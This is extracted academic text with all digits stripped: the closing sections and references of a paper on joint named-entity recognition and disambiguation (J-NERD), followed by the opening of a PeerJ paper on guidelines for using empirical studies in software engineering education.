. . j-nerdlinear-global . . . j-nerdtree-global . . . end-to-end nerd j-nerdlinear-local . . . j-nerdtree-local . . . j-nerdlinear-global . . . j-nerdtree-global . . . table shows that all variants perform very well on boundary detection and ner typing, with small differences only. for end-to-end nerd, however, j-nerdtree-global outperforms all other variants by a large margin. this results in achiev- ing the best f score of . %, which is . % higher than j-nerdlinear-global. we performed a paired t-test between these two variants, and ob- tained a p-value of . . the local variants of j- nerd lose around % of f because they do not capture the coherence among mentions in different sentences. in the rest of our experiments, we therefore fo- cus on j-nerdtree-global and the task of end-to-end nerd. . . comparison of joint vs. pipelined models and baselines in this subsection, we demonstrate the benefits of joint models against pipelined models including state-of-the-art baselines. in addition to the com- petitors introduced in . . , we add a pipelined configuration of j-nerd , named p-nerd. that is, we first run j-nerd in ner mode (only con- sidering ner features f .. and f .. ). the best sequence of ner labels is then given to j-nerd to run in ned mode (only considering ned fea- tures f .. and f ). table : comparison between joint models and pipelined models on end-to-end nerd. method prec rec f p-nerd . . . j-nerd . . . aida-light . . . tagme . . . spotlight . . . the results are shown in table . j-nerd achieves the highest precision of . % for end- to-end nerd, outperforming all competitors by a large margin. this results in achieving the best f score of . %, which is . % higher than p- nerd and . % higher than aida-light. note that (nguyen et al., ) reported higher preci- sion for aida-light, but that experiment did not consider out-of-kb entities which pose an ex- tra difficulty in our setting. also, the test corpora – conll-yago vs. conll-yago – are not quite comparable (see above). tagme and spotlight are clearly inferior on this dataset (more than % lower in f than j- nerd). it seems these systems are more geared for efficiency and coping with popular and thus frequent entities, whereas the conll-yago dataset contains very difficult test cases. for the best f score of j-nerd, we performed a paired t-test against the other methods’ f values and determined a p-value of . . we also compared the ner performance of j-nerd against the state-of-the-art method for ner alone, the stanford ner tagger version . . . for mention boundary detection, j-nerd achieved an f score of . % versus . % by stanford ner and . % by p-nerd. for ner typing, j-nerd achieved an f score of . % versus . % by stanford ner and . % by p- nerd. so we could not outperform the best prior method for ner alone, but achieved very compet- itive results. here, we do not really leverage any form of joint inference (combining crf’s across sentences is used in stanford ner, too), but har- ness rich features on domains, entity candidates, and linguistic dependencies. . . influence of features to analyze the influence of the features, we per- formed an additional ablation study on the global j-nerd tree model, which is the best variant of j-nerd , as follows: • standard features only include features intro- duced in section . . • standard and domain features exclude the lin- guistic features f ,f ,f ,f . • standard and linguistic features excludes the domain features f and f . • all features is the full-fledged j-nerdtree-global model. table : feature influence on conll-yago . perspective setting f ner typing standard features . standard and domain features . standard and linguistic features . all features . end-to-end nerd standard features . standard and domain features . standard and linguistic features . all features . table shows the results, demonstrating that linguistic features are crucial for both ner and nerd. for example, in the sentence “woolmer played tests for england”, the mention “eng- land” refers to an organization (the english cricket team), not to a location. the dependency-type fea- ture prep for[play, england] is a decisive cue to handle such cases properly. domain features help in ned to eliminate, for example, football teams when the domain is cricket. . end-to-end nerd on ace for comparison to the recently developed berkeley-entity system (durrett and klein, ), the authors of that system provided us with detailed results for the entity-annotated ace’ corpus, which allowed us to discount non-entity (so-called “nom-type”) mappings (see subsection . . ). all other systems, including the best j-nerd method, were run on the corpus under the same conditions. table : nerd results on ace. method prec rec f p-nerd . . . j-nerd . . . berkeley-entity . . . aida-light . . . tagme . . . spotlight . . . j-nerd outperforms p-nerd and berkeley- entity: f scores are . % and . % better, re- spectively, with a t-test p-value of . (table ). following these three best-performing systems, aida-light also achieves decent results. the other systems show substantially inferior performance. the performance gains that j-nerd achieves over berkeley-entity can be attributed to two fac- tors. first, the rich linguistic features of j-nerd help to correctly cope with some difficult cases, e.g., when common nouns are actually names of people. second, the coherence features of global j-nerd help to properly couple decisions on re- lated entity mentions. . end-to-end nerd on clueweb the results for clueweb are shown in table . again, j-nerd outperforms all other systems with a t-test p-value of . . the differences be- tween j-nerd and fast ned systems such as tagme or spotlight become smaller as the num- ber of prominent entities (i.e., prominent people, organizations and locations) is higher on clueweb than on conll-yago . table : nerd results on clueweb. dataset method prec rec f clueweb p-nerd . . . j-nerd . . . aida-light . . . tagme . . . spotlight . . . clueweblong−tail p-nerd . . . j-nerd . . . aida-light . . . tagme . . . spotlight . . . conclusions we have shown that coupling the tasks of ner and ned in a joint crf model is beneficial. our j-nerd method outperforms strong baselines on a variety of test datasets. the strength of j-nerd comes from three novel assets. first, our tree crf’s capture the structure of dependency parse trees, and we couple multiple of such tree mod- els across sentences. second, we harness non- standard features about domains and novel fea- tures for linguistic patterns derived from parsing. third, our joint inference maintains uncertain can- didates for both mentions and entities and makes decisions as late as possible. in our future work, we plan to explore use cases for joint nerd, espe- cially for content analytics over news streams and social media. references luisa bentivogli, pamela forner, bernardo magnini, and emanuele pianta. . revising the wordnet domains hierarchy: semantics, coverage and bal- ancing. in proceedings of the workshop on multi- lingual linguistic ressources, mlr ’ , pages – . acl. luisa bentivogli, pamela forner, claudio giu- liano, alessandro marchetti, emanuele pianta, and kateryna tymoshenko. . extending en- glish ace corpus annotation with ground- truth links to wikipedia. in the people’s web meets nlp: collaboratively constructed semantic resources ’ , pages – . coling. razvan bunescu and marius pasca. . using encyclopedic knowledge for named entity disam- biguation. in eacl ’ , pages – . acl. david carmel, ming-wei chang, evgeniy gabrilovich, bo-june paul hsu, and kuansan wang. . erd’ : entity recognition and disambiguation challenge. in sigir ’ , page . acm. marco cornolti, paolo ferragina, and massimiliano ciaramita. . a framework for benchmark- ing entity-annotation systems. in www ’ , pages – . acm. marco cornolti, paolo ferragina, massimiliano cia- ramita, hinrich schütze, and stefan rüd. . the smaph system for query entity recognition and disambiguation. in proceedings of the first inter- national workshop on entity recognition and dis- ambiguation, erd ’ , pages – . acm. bruce croft, donald metzler, and trevor strohman. . search engines: information retrieval in practice. addison-wesley publishing company. silviu cucerzan. . large-scale named en- tity disambiguation based on wikipedia data. in emnlp-conll ’ , pages – . acl. silviu cucerzan. . name entities made obvious: the participation in the erd evaluation. in proceedings of the first international workshop on entity recognition and disambiguation, erd ’ , pages – . acm. hamish cunningham, diana maynard, kalina bontcheva, et al. . text processing with gate. university of sheffield. joachim daiber, max jakob, chris hokamp, and pablo n. mendes. . improving efficiency and accuracy in multilingual entity extraction. in pro- ceedings of the th international conference on se- mantic systems, i-semantics ’ , pages – . acm. marie-catherine de marneffe, bill maccartney, and christopher d. manning. . generating typed dependency parses from phrase structure parses. in proceedings of the international conference on language resources and evaluation, lrec ’ , pages – . elra. stephen dill, nadav eiron, david gibson, et al. . semtag and seeker: bootstrapping the semantic web via automated semantic annotation. in www ’ , pages – . acm. greg durrett and dan klein. . a joint model for entity analysis: coreference, typing, and linking. in tacl ’ . acl. paolo ferragina and ugo scaiella. . tagme: on-the-fly annotation of short text fragments (by wikipedia entities). in cikm ’ , pages – . acm. jenny rose finkel, trond grenager, and christopher manning. . incorporating non-local informa- tion into information extraction systems by gibbs sampling. in acl ’ , pages – . acl. michael fleischman and eduard hovy. . fine grained classification of named entities. in col- ing ’ , pages – . acl. johannes hoffart, mohamed amir yosef, ilaria bor- dino, hagen fürstenau, manfred pinkal, marc span- iol, bilyana taneva, stefan thater, and gerhard weikum. . robust disambiguation of named entities in text. in emnlp ’ , pages – . acl. johannes hoffart, stephan seufert, dat ba nguyen, martin theobald, and gerhard weikum. . kore: keyphrase overlap relatedness for entity disambiguation. in cikm ’ , pages – . acm. johannes hoffart, fabian m. suchanek, klaus berberich, and gerhard weikum. . yago : a spatially and temporally enhanced knowledge base from wikipedia. ai vol. , pages – . johannes hoffart, yasemin altun, and gerhard weikum. . discovering emerging entities with ambiguous names. in www ’ , pages – . acm. daphne koller, nir friedman, lise getoor, and ben- jamin taskar. . graphical models in a nut- shell. in an introduction to statistical relational learning. mit press. sayali kulkarni, amit singh, ganesh ramakrishnan, and soumen chakrabarti. . collective annota- tion of wikipedia entities in web text. in kdd ’ , pages – . acm. xiao ling and daniel s. weld. . fine-grained entity recognition. in aaai ’ . aaai press. dong c. liu and jorge nocedal. . on the limited memory bfgs method for large scale optimiza- tion. mathematical programming vol. , pages – . bernardo magnini and gabriela cavagli. . inte- grating subject field codes into wordnet. in proceed- ings of the international conference on language resources and evaluation, lrec ’ , pages – . elra. andrew mccallum and wei li. . early re- sults for named entity recognition with condi- tional random fields, feature induction and web- enhanced lexicons. in hlt-naacl ’ , pages – . acl. edgar meij, wouter weerkamp, and maarten de rijke. . adding semantics to microblog posts. in proceedings of the fifth acm international confer- ence on web search and data mining, wsdm ’ , pages – . acm. pablo n. mendes, max jakob, andrés garcı́a-silva, and christian bizer. . dbpedia spotlight: shedding light on the web of documents. in proceedings of the th international conference on semantic systems, i-semantics ’ , pages – . acm. george a. miller. . wordnet: a lexical database for english. pages – . acm. david milne and ian h. witten. . learning to link with wikipedia. in cikm ’ , pages – . acm. david milne and ian h. witten. . an open-source toolkit for mining wikipedia. artificial intelligence vol. , pages – . ndapandula nakashole, tomasz tylenda, and gerhard weikum. . fine-grained semantic typing of emerging entities. in acl ’ , pages – . acl. dat ba nguyen, johannes hoffart, martin theobald, and gerhard weikum. . aida-light: high- throughput named-entity disambiguation. in pro- ceedings of the workshop on linked data on the web, ldow ’ . ceur-ws.org. alexandre passos, vineet kumar, and andrew mccal- lum. . lexicon infused phrase embeddings for named entity resolution. in proceedings of the eigh- teenth conference on computational natural lan- guage learning, conll ’ , pages – . acl. altaf rahman and vincent ng. . inducing fine- grained semantic classes via hierarchical and col- lective classification. in coling ’ , pages – . acl. lev ratinov and dan roth. . design challenges and misconceptions in named entity recognition. in conll ’ , pages – . acl. lev ratinov, dan roth, doug downey, and mike an- derson. . local and global algorithms for dis- ambiguation to wikipedia. in hlt ’ , pages – . acl. avirup sil and alexander yates. . re-ranking for joint named-entity recognition and linking. in cikm ’ , pages – . acm. valentin i. spitkovsky and angel x. chang. . a cross-lingual dictionary for english wikipedia concepts. in proceedings of the international conference on language resources and evaluation, lrec ’ . elra. charles a. sutton and andrew mccallum. . an introduction to conditional random fields. foun- dations and trends in machine learning vol. , pages – . ricardo usbeck, michael röder, axel-cyrille ngonga ngomo, et al. . gerbil – general entity anno- tation benchmark framework. in www ’ . acm. mohamed amir yosef, sandro bauer, johannes hof- fart, marc spaniol, and gerhard weikum. . hyena: hierarchical type classification for entity names. in coling ’ , pages – . acl. submitted november accepted august published september corresponding author fabian fagerholm, fabian.fagerholm@helsinki.fi academic editor perdita stevens additional information and declarations can be found on page doi . /peerj-cs. copyright fagerholm et al. distributed under creative commons cc-by . open access guidelines for using empirical studies in software engineering education fabian fagerholm ,*, marco kuhrmann ,* and jürgen münch , ,* department of computer science, university of helsinki, helsinki, finland institute for applied software systems engineering, clausthal university of technology, goslar, germany herman hollerith center (hhz), reutlingen university, böblingen, germany * these authors contributed equally to this work. abstract software engineering education is under constant pressure to provide students with industry-relevant knowledge and skills. educators must address issues beyond exercises and theories that can be directly rehearsed in small settings. industry training has similar requirements of relevance as companies seek to keep their workforce up to date with technological advances. real-life software development often deals with large, software-intensive systems and is influenced by the complex effects of teamwork and distributed software development, which are hard to demonstrate in an educational environment. a way to experience such effects and to increase the relevance of software engineering education is to apply empirical studies in teaching. in this paper, we show how different types of empirical studies can be used for educational purposes in software engineering. we give examples illustrating how to utilize empirical studies, discuss challenges, and derive an initial guideline that supports teachers to include empirical studies in software engineering courses. furthermore, we give examples that show how empirical studies contribute to high-quality learning outcomes, to student motivation, and to the awareness of the advantages of applying software engineering principles. having awareness, experience, and understanding of the actions required, students are more likely to apply such principles under real-life constraints in their working life. subjects computer education, software engineering keywords software engineering education, computer science curricula, teaching methods, empirical studies, experimentation, education, guideline introduction providing relevant knowledge and skills is a continuous concern in software engineering education. students must be exposed to realistic settings to understand why applying fundamental software engineering principles is necessary, why decisions should be grounded in evidence, and to learn to foresee long-term and delayed effects of certain behaviour or decisions in software projects. using empirical instruments is one approach to teach relevant software engineering knowledge and skills. the goal of this paper is to use our teaching experiences to develop practice-grounded guidelines that help teachers include empirical instruments in their teaching. since real-life software development routinely deals with large, software-intensive systems and is influenced by the manifold and complex effects of teamwork and distributed how to cite this article fagerholm et al. ( ), guidelines for using empirical studies in software engineering education. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:fabian.fagerholm@helsinki.fi https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. software development, software engineering education must enable students to understand such environments and to apply knowledge properly and effectively. however, restrictions in the academic curriculum and the complexity and criticality of real software products limit the level of realism that can be achieved in education. as problems are narrowed down to be manageable, practical relevance is lost through scope and problem size limitations and the use of artificial settings instead of real-world problems. many effects only become visible over long time periods, e.g., the efficiency of a particular method or eventual impact of a design decision. often, time is too limited to provide adequate means to experience such effects in a single course. the same problem occurs in practitioner training. industry must quickly develop solutions and services in order to deliver customer value and, eventually, survive in market competition. empirical evidence may not be easily available, and practitioners may resort to decision-making based on by biased individual beliefs, negatively affecting the productivity of development teams. over the years, we have implemented empirical instruments in software engineering courses to ( ) provide an environment in which students can experience real-life problems while increasing their motivation and the quality of learning outcomes, ( ) pave the way for conducting research in collaboration with industry, and ( ) apply these instruments in industry for training purposes. in our experience, this approach has been well suited to prepare students for working life. training in empirical instruments, such as experimentation or case study research, and direct experience of the value provided by them, has encouraged our students to apply their acquired knowledge in practice, and to explore problems, new methods, and new tools in a systematic and evidence-based manner. since empirical instruments are well accepted for conducting (applied) research in industry, and since students can form their own experiences when doing empirical studies, we claim that utilizing empirical instruments in teaching increases the quality as well as the practical relevance of se education. we show how different instruments, ranging from controlled experiments to qualitative studies, can be used for teaching purposes. we also consider overarching approaches that situate empirical studies in a larger context. we systematize purposes and challenges of the different study types, discuss the validity of the results that can be obtained in a teaching context, and create a link between teaching and research. we use a selection of representative studies to discuss the impact on teaching as well as on industry relevance. the guidelines developed in this paper provide a systematic collection of purposes, learning goals, challenges, and validity constraints, and aims to support teachers in selecting proper study types for inclusion into their courses. the remainder of this paper is structured as follows. ‘related work’ reviews related work on empirical studies as a teaching instrument. ‘research approach’ describes the research approach taken in this paper. ‘an overview of empirical study types for software engineering education’ discusses empirical instruments in se education and provides an initial taxonomy of them. ‘a guideline for integrating empirical studies with software engineering courses’ presents the main contribution of the paper: a guideline for integrating empirical studies with software engineering courses. ‘experiences’ gives examples of implementing empirical instruments in university education and discusses the fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. implications of integrating them into courses. ‘conclusion’ provides conclusions and lists possible future work. related work experiments and other types of empirical studies are key to the scientific approach. empirical studies are performed in research for many different purposes, such as understanding real-world phenomena, testing hypotheses, and validating theories (wohlin et al., ; runeson et al., ; kitchenham, budgen & brereton, ). empirical studies, especially experiments, are established only in few disciplines. the use of empirical studies as teaching tools is less common than, for example, classroom exercises and lectures. in many areas, such as software engineering, such utilization of empirical studies is still uncommon compared to learning tasks that involve reading or writing about existing research, and individual exercises that focus mainly on small-scale technical implementation. empirical studies in teaching in other disciplines physics education may be a prime example where, due to the historical development of the discipline, experiments have a central pedagogical role. beyond their function as means for verifying or refuting theories, experiments in physics have a generative function with relevance for education and learning (koponen & mäntylä, ). while the type of problems in physics and software engineering are different, experiments play a similar role for learning in both. an example of another discipline, also different in nature from physics, that already has a high level of maturity in using experiments for teaching purposes is economics. experiments became widespread teaching tools in economics in the s (parker, ). nowadays, many economists use experiments as educational tools. parker ( ) mentions several benefits of using experiments: they are distinctive and more participative, and in consequence, students are likely to remember lessons associated with them. parker also mentions that the experiential component in experiments can be very important and that students and instructors usually think that experiments are fun. experiments can be used as part of many educational approaches. for example, experiments could be used in different ways with problem-based learning (pbl) (barrows & tamblyn, ; wood, ). in pbl, students define their own learning objectives connected to a problem scenario, while the tutor ensures that the objectives are ‘‘focused, achievable, comprehensive, and appropriate’’ (wood, ). one possibility is to have the tutor guide students towards objectives that involve different degrees of experimentation, e.g., formulating research questions, defining research designs, or even carrying out studies with real or simulated data. the tutor may provide data as part of the problem scenario; it may be part of the trigger material provided to students. experiments can also be used as part of project-based learning (blumenfeld et al., ), where students actively explore real-world challenges and problems. instructors can introduce experiments when important decision-making and knowledge acquisition needs emerge. in order to support the design of constructive education with experiments embedded, as well as to support experimentation within more traditional teaching, teachers would benefit from guidelines or sets of ready-made experiment templates that they could use fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. either when planning or dynamically during teaching. the serc portal for pedagogy in action, created by ball et al. ( ), provides a repository of classroom experiments. ball et al. define such experiments as ‘‘activities where any number of students work in groups on carefully designed guided inquiry questions’’. students collect data through interaction with typical laboratory materials, data simulation tools, or a decision-making environment, as well as ‘‘a series of questions that lead to discovery-based learning.’’ the repository includes a comprehensive list of experiments from different disciplines that can be used for replication in classroom settings. in addition, it contains references to scientific studies that provide empirical evidence about the expected positive effects of experiments as teaching tools. an example is an empirical investigation of the impact of classroom experiments on the learning of economics (frank, ). several of the cited studies show a higher academic achievement (e.g., measured as increase in students’ homework scores) when using experiments compared to control classes where standard lectures are used. ball et al. ( ) also cite studies that show improved student satisfaction with teaching pedagogy when using experiments. the repository also contains guidelines for designing and conducting experiments as part of teaching. the guidelines include important aspects such as strategies for unexpected outcomes of experiments. requirements for applying empirical studies in teaching the discussion regarding the suitability of experiments mainly focuses on criteria that need to be fulfilled for designing successful experiments, the balance between practical work and theory, and the suitability of students as experimental subjects. parker ( ) mentions basically three criteria: ( ) the experiment must be aligned with the central topic of the course, ( ) the concept to be taught through the experiment should not be easily understood without the experiment or already be obvious, ( ) students need to be able to quickly learn the necessary prerequisites for participating in the experiment. dillon ( ) provides an overview of advantages and disadvantages of experiments based on empirical findings. an important conclusion drawn from the overview is that successful observation of a phenomenon as part of an empirical study should not be an end in itself. rather, students should have enough time to get familiar with the related ideas and concepts associated with the phenomenon. empirical studies in software engineering education in software engineering, experimentation was established in the s. basili, selby & hutchens ( ) were among the first to present a framework and process for experimentation. since then, software engineering experiments in classroom settings have become more common. however, the focus of most of such experiments has been to gain research knowledge, with students participating as research subjects. less attention has been paid to using empirical studies with an educational purpose in mind, where the experiment has an explicit didactic or experiential role. few curricula are available that include the execution of empirical studies as an integral part of a lecture (e.g., kuhrmann, fernández & münch, ; hayes, ). the use of students as experimental subjects has often been discussed in the literature. in software engineering, the topic has mainly been analysed for understanding the suitability fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of students as subjects compared to professional practitioners as subjects. an example of such an investigation has been presented by runeson ( ). carver et al. ( ) note that while it is common to carry out empirical studies in software engineering with students as subjects, the educational value of the studies is often overlooked. simultaneously, solving the pedagogical challenges involved is not straightforward. carver et al. discuss costs and benefits for researchers, students, instructors, and industry, and provide a check-list with advice for carrying out empirical studies with student subjects. the same authors have later extended their check-list with requirements for successful empirical studies with students, based on previous literature (carver et al., ). the check-list includes items addressing considerations before a class begins, as soon as it begins, when the study begins, and when the study is completed. the authors emphasise integration of the study and course topic and schedule, documentation, and considerations of study validity. only few studies have investigated the impact on learning of empirical studies in the curriculum. we expect that the effect is generally positive as long as the integration is carried out properly. staron ( ) finds that students’ learning process is improved and that including carefully designed experiments into software engineering courses increases their motivation. a large majority ( %) of students who participated as subjects in the experiments found them useful, and the number of high-passes increased by % after introducing experiments. while many articles report on empirical studies using student subjects, and some articles report on the educational benefits of such studies for students, few papers address empirical studies as an overall strategy for software engineering education. in particular, there is a lack of guidance for using empirical studies in software engineering education in cases where students may not only be research subjects but could also be involved in carrying out the studies. an overview that discusses different types of empirical studies, their suitability for education, as well as challenges with respect to their execution is missing. research approach the goal of this paper is to develop guidelines that help teachers integrate empirical instruments in software engineering education. the guidelines are based on a reflective analysis of our experiences with teaching courses that use empirical elements to support learning objectives. a reflective approach has been recognised by many educational researchers as a prerequisite for effective teaching (e.g., hatton & smith, ; cochran- smith, ; jones & jones, ). reflective practice, with roots in the works of dewey ( ) and schön ( ), calls for continuous learning through deliberate reflection in and on action. using empirical instruments in software engineering education is a way to encourage students to reflect, but teachers should do the same. this paper represents one outcome of reflection-on-action: we analyse materials, assignments, notes, course syllabi, schedules and structures, evaluation data, and recollections of important factors in a number of our own courses, and derive guidelines that we believe would help teachers implement similar courses. our approach is mainly qualitative and has proceeded from gathering a list of study types through analysis of materials and experiences relevant to each study type to the guideline fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. proposed in this paper. here, analysis refers to categorisation of materials and identification of connections and relationships between categories. our main goal of developing the guideline helped to scope our investigation, and we thus left out material which did not serve this goal. we began by sifting through parts of the published literature on software engineering education and methods in order to shape a first outline of a taxonomy of study types. in particular, we were influenced by höst ( ) and carver et al. ( ) when considering software engineering education, and by shull, singer & sjøberg ( ) and kitchenham, budgen & brereton ( ) when considering the methodological aspects. our search was purposive rather than systematic, as we sought to construct a taxonomy (see ‘an overview of empirical study types for software engineering education’) for use in the guidelines rather than for the purpose of representing the state of the art in the scientific literature. after constructing the taxonomy, we analysed qualitative data from our own courses and arranged it according to five categories: ( ) learning goals, purposes, challenges, and validity, ( ) establishing context and goals, and determining a study type, ( ) motivating students, ( ) scheduling, ( ) other considerations. we summarised the qualitative data in each category by removing the details specific to our courses and generalising the insights so that they can be applied more broadly. we then constructed the guideline by cross-referencing the categories so that the purpose, challenges, and validity concerns relevant for each study type is shown. the result is given in ‘a guideline for integrating empirical studies with software engineering courses’. finally, we revisited the material from our courses and picked examples that illustrate how we tackled some of the choices teachers face when using empirical instruments for education. we also addressed the specific question of evaluating our teaching by providing data from formal as well as informal evaluation (see ‘experiences’). this serves as a first validation of the guidelines. an overview of empirical study types for software engineering education the software engineering literature includes a number of empirical studies with students, and often these studies were conducted in an educational setting. in this section, we give an overview of (empirical) study types utilised in software engineering education. we list common instruments from empirical software engineering and provide examples of how these instruments can be applied to teaching. the overall goal of this section is to summarise different study types that can be used in software engineering education. the summary supports the development of an initial common taxonomy that categorises study types. the taxonomy helps to determine the appropriateness of a particular instrument in a specific setting. a concise overview of the study types, including a brief description and outline of the potential positive educational aspects, is given in table . case studies case studies aim to investigate a phenomenon in its natural context. when utilised for educational purposes, case studies can omit some aspects of a full research design (yin, fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table summary of empirical study types. type description potential for education case study investigate phenomenon in its natural context. especially suitable for exploratory and explana- tory designs. results grounded in context. gaining observational and analytic skills. observing real scenarios with real objectives and constraints. knowledge of high rele- vance for professional use. formal and semi-formal experiment investigate effect of treatment under controlled conditions. rigorous design requirements. re- sults constitute tests of a theory. demonstrate the real impact of theory. gain skills to formulate and test a theory. continuous experimentation constant series of experiments to test value creation, delivery, and capture of software or software-based products. results of experiments can be used to make design decisions. understand connection between software development and business and customer domain. gain skills to test product assump- tions to provide evidence for product deci- sions. software process simulation simulation model used as abstraction of a real process. cost and time advantages can be ob- tained. requires a valid model. gain understanding of process dynamics and complexity with limited resources. ex- perience effects of decisions. individual studies e.g., bachelor’s or master’s theses. focused work on a specific problem for a limited time. various studies are possible. learn to conduct a study in a self-organised manner. gain domain knowledge. further instruments augment or provide context for aforemen- tioned study types, e.g., replication studies, oss projects. provide ways to enhance other study types. ), but can borrow from design science methodology (hevner et al., ) where an artefact is designed, implemented, and evaluated in order to learn. when performing case studies with industry, the context is provided by business objectives and realistic constraints (brügge, krusche & alperowitz, ). industry aims to develop results which contribute to solving a problem with relevance in their settings. for instance, developers can be trained in a close-to-reality environment, aiding the understanding of situations that will occur in the (near) future. on the other hand, researchers perform case studies to understand and capture phenomena in their natural context. depending on the rigorousness of the study design, both practitioners and researchers benefit from a case study due to its grounding in realistic settings. apart from ‘‘normal’’ case study research, teachers can use the case study instrument to help motivate students by providing problems with visible real-life applications. case studies also help teachers to transmit procedural knowledge, as students are required to formulate problems and design solutions, and to evaluate them. case studies help answering explanatory questions of the type ‘‘how?’’ or ‘‘why?’’ they should be based on an articulated theory regarding the phenomenon of interest (yin, ). a case study can then provide additional evidence for a theory, help to modify or refine a theory, or suggest an alternative theory that better fits the observations. furthermore, a case study can also be utilized to discover (new) interesting and relevant issues. case studies can be implemented in different ways. they can be categorized as single- or multiple-case, holistic or embedded (wohlin et al., ; runeson et al., ; yin, ), or as intrinsic (stake, ; baxter & jack, ). they can be deductive or inductive, exploratory or fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. confirmatory, and they can make use of both quantitative and qualitative data (yin, ; eisenhardt, ). in the context of teaching, the normal case study setup is a holistic single-case study in which a single instance of the unit of analysis (case) is examined. more complex designs, e.g., multiple-case studies, increase the value of the study results for research. however, these aspects can be considered less important for teaching. furthermore, setting up a case study—even in teaching—requires an environment in which the phenomenon of interest occurs naturally. case studies are a valuable source for generating diverse results. from the industry point of view, case studies help to elaborate and understand the value given by reaching the case objective, ranging from increased technological understanding to increased understanding of customer value of a product or service. they help uncover real technology- and knowledge-related challenges involved in reaching the objective and, thus, provide information on the cost, effort, and risks involved in the case. from the perspective of researchers, case studies can contribute to the development of general—but context- bound—technological rules, including case-specific insights and lessons learnt. given replication with multiple cases, the rules can also reach the level of more general theory. moreover, case studies can be fruitful grounds for exploration and help to discover or identify research questions. from the teaching perspective, case studies serve several purposes of which gaining observational and analytic skills are the most important. case studies help participants to get insights into a setting in which a particular phenomenon occurs. therefore, analysing problems and deriving tasks to solve the problem happens in real scenarios rather than synthetic situations. solutions can be evaluated against real objectives and constraints. consequently, this kind of learning produces knowledge of higher relevance for professional use, and teaching directly addresses subject matter and procedural knowledge related to a specific problem type. examples of case studies in teaching fagerholm, oza & münch ( ) describe the software factory, which is an instrument to combine software development education and training with conducting empirical research. a fruitful ground for this kind of teaching is global software development, as demonstrated by, e.g., oza et al. ( ), richardson, milewski & mullick ( ), and deiters et al. ( ). in the software factory environment, students work with a company on a real software development project, providing a level of realism that is not available in a regular course exercise. this realism, along with the opportunity to work in a team setting provides the potential to conduct case studies with educational relevance. formal and semi-formal experiments according to wohlin et al. ( ), an experiment (controlled experiment) is defined as ‘‘an empirical inquiry that manipulates one factor or variable of the studied setting.’’ different treatments are applied, or treatments are assigned to different subjects, to measure effects on variables of interest. if treatment is not randomly assigned, we speak of a ‘‘quasi-experiment.’’ experiments aim to investigate settings in which the environment fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. is under control, and effects of interest are investigated by manipulating variables. for instance, if the efficiency of a particular method is subject to investigation, one experiment group is assigned to solve a problem with the ‘‘new’’ method, while another group works on the same task, but using another method. results are then compared, e.g., to accept or reject a hypothesis. thus, experiments can be utilised to test theories and conventional wisdom, explore relationships, to evaluate the accuracy of models, and to validate measures. importantly, experiments should always provide a detailed context description, showing the settings in which certain claims are true, and in which certain techniques or tools are beneficial. experiments require rigorous design. wohlin et al. ( ) present an experiment process which consists of scoping, planning, operation, analysis and interpretation, and presentation and packaging. however, providing a general experiment design is demanding, as the design depends on the respective subject and context. apart from the general experiment process, several smaller guidelines exist to direct researchers through the process, e.g., the goal template from the tame project (basili & rombach, ), experimentation packages providing reusable designs, templates, and so forth (e.g., in the context of self-organizing project teams (kuhrmann & münch, b), we created such a template; another example can be found in fucci, turhan & oivo ( )), and, pragmatically, case study designs, which can be derived from, e.g., runeson & höst ( ), who provide advice on planning and a guideline on reporting case study research. experiments provide several trade-offs for the conducting parties. however, the usefulness depends on the respective context. for instance, while the importance of experiments in research is not questioned, experimentation in industry has to be considered in terms of business value (e.g., by providing new, efficient methods or creating and evaluating software prototypes, paving the way for new products). requirements regarding the validity of the results differ as well as the general scope of experiments. furthermore, as we have previously discussed, small and very small companies usually have insufficient resources to invest in the necessary preparation and allocation of resources (kuhrmann, ). nevertheless, experimentation allows for, e.g., evaluating different methods and tools, building a hypothesis, and testing the hypothesis. furthermore, experiments help to confirm conventional wisdom, e.g.: ‘‘everybody says that follow-the-sun development is fast but expensive—is this also true for our situation?’’. examples of experimentation in teaching for teaching, experiments can be a valuable source for knowledge and experience. for instance, experiments can be used to elaborate the real impact of theoretical concepts: in kuhrmann & münch ( b), the theoretical concept taught was the well-known tuckman model (tuckman, ), and in a complementing experiment, students could experience the effects of group dynamics themselves, e.g., changing team set-ups or external influences. another experiment reported in kuhrmann & münch ( a) creates a setting in which students can experience the crucial role of communication (and absent communication) in distributed development set-ups. fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in kuhrmann, fernandez & knapp ( ), we present a controlled experiment on the perception of software process modelling paradigms. a german ngo sponsored a process description, which the students had to analyse and improve according to a given approach (kuhrmann, fernández & münch, ). students used two different process development environments, each implementing a different modelling paradigm. they went through the process life cycle, learned about analysis-, design-, and realisation tasks, and conducted result assessments. furthermore, the experiment outcomes showed advantages and disadvantages of the particular modelling paradigms. continuous experimentation continuous experimentation refers to a constant series of experiments to test the value of software capabilities such as features early in its design process (fagerholm et al., a; fagerholm et al., ). the major driver is the industrial need to better understand product value delivery, so that development activities can be focused on delivering only capabilities that create value for users or customers. our experience shows that it is a mistake to ignore the value aspect in se education, as it is a critical part of understanding software requirements. this is especially relevant in complex domains where requirements are unknown and cannot be elicited up front. in contrast to empirical software engineering that usually focuses on technical product or process aspects from a developer perspective, the purpose of continuous experimentation is to validate assumptions that are underlying a business model or a product roadmap. the perspective is usually that of a product owner or entrepreneur. continuous experimentation is a means to evolve business models, product roadmaps, or feature scopes based on validated assumptions. it is based on approaches such as lean startup (ries, ) and customer development (blank, ), and enforces product managers and developers to connect with real users (e.g. through interviews or by analysing usage data) in order to test critical assumptions and make evidence-based product decisions. this 